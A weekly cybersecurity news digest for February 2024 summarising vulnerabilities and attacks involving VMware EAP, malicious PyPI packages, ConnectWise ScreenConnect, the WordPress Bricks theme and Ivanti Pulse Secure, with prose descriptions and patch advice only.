02/14/2024-02/21/2024 VMware Alert, New Malicious PyPI Packages,Critical Flaws in ConnectWise ScreenConnect Software And More.

1. VMware Alert: Uninstall EAP Now – Critical Flaw Puts Active Directory at Risk

VMware advises uninstalling the deprecated Enhanced Authentication Plugin (EAP) due to a critical security flaw (CVE-2024-22245, CVSS score: 9.6), described as an arbitrary authentication relay bug. This flaw could enable a malicious actor to manipulate service tickets for arbitrary Active Directory Service Principal Names (SPNs) through a user’s browser. Also discovered is a session hijack flaw (CVE-2024-22250, CVSS score: 7.8) in EAP, allowing a local actor to seize a privileged session. Users connecting to VMware vSphere via the vSphere Client on Windows systems may be affected. VMware will not patch these flaws, recommending complete removal of the plugin. Meanwhile, SonarSource disclosed cross-site scripting (XSS) flaws in Joomla! (CVE-2024-21726), addressed in versions 5.0.3 and 4.4.3, posing a moderate threat.

2. New Malicious PyPI Packages Caught Using Covert Side-Loading

TacticsCybersecurity researchers found two malicious packages on PyPI using DLL side-loading to evade detection and execute harmful code. Named NP6HelperHttptest and NP6HelperHttper, they were downloaded 537 and 166 times before removal. This discovery underscores the expanding threat of software supply chain attacks. The NP6 reference connects to a legitimate ChapsVision marketing solution, with the fake packages mimicking legitimate tools NP6HelperHttp and NP6HelperConfig. Their goal is to deceive developers into downloading rogue versions. These packages contain a setup.py script designed to download an executable vulnerable to DLL side-loading (“ComServer.exe”) and a malicious DLL (“dgdeskband64.dll”). The DLL aims to avoid detection, similar to previous cases like the npm package “aabquerys,” which deployed a remote access trojan. It communicates with an attacker-controlled domain to fetch malicious code, potentially part of a broader campaign targeting supply chain security in open-source repositories.

3. Critical Flaws Found in ConnectWise ScreenConnect Software – Patch Now

ConnectWise issued updates for its ScreenConnect remote desktop software to fix two security flaws, one critical allowing remote code execution. The vulnerabilities, lacking CVE identifiers, include authentication bypass (CVSS: 10.0) and path traversal (CVSS: 8.4). These critical issues affect versions 23.9.7 and below, with fixes in version 23.9.8, reported on February 13, 2024. Although no exploitation evidence exists, self-hosted users are urged to update. ConnectWise will provide updates for versions 22.4 through 23.9.7, but recommends version 23.9.8. Huntress found over 8,800 vulnerable servers and demonstrated an exploit bypassing authentication, emphasizing the need for immediate action.

4. WordPress Bricks Theme Under Active Attack: Critical Flaw Impacts 25,000+ Sites

The Bricks WordPress theme suffers a critical flaw (CVE-2024-25600, CVSS: 9.8) exploited for remote code execution by unauthenticated attackers. Versions up to 1.9.6 are vulnerable, fixed in 1.9.6.1 released on February 13, 2024. The flaw, reported by Snicco on February 10, involves a nonce-related vulnerability in the prepare_query_vars_from_settings() function. Attack attempts started on February 14, with over three dozen detected by Wordfence. The flaw exposes around 25,000 active installations. Users should promptly update to mitigate risks.

5. Ivanti Pulse Secure Found Using 11-Year-Old Linux Version and Outdated Libraries

A firmware analysis of Ivanti Pulse Secure appliances uncovered significant vulnerabilities, highlighting the ongoing challenge of securing software supply chains. The firmware, based on unsupported CentOS 6.4, exposes outdated Linux components dating back over a decade. Threat actors exploit these weaknesses, targeting Ivanti Connect Secure, Policy Secure, and ZTA gateways with various malware. Active exploits include CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893, with Akamai reporting heightened scanning activity for CVE-2024-22024. Exploiting CVE-2024-21893, Eclypsium gained access to the appliance, revealing outdated packages and vulnerable libraries. Notably, Perl remains at version 5.6.1 from 2001, and the Linux kernel at 2.6.32, posing significant risks. Additionally, Ivanti’s Integrity Checker Tool (ICT) exhibits flaws, potentially allowing attackers to bypass detection. Eclypsium emphasizes the need for transparent validation processes to bolster supply chain security amid increasing exploitation attempts.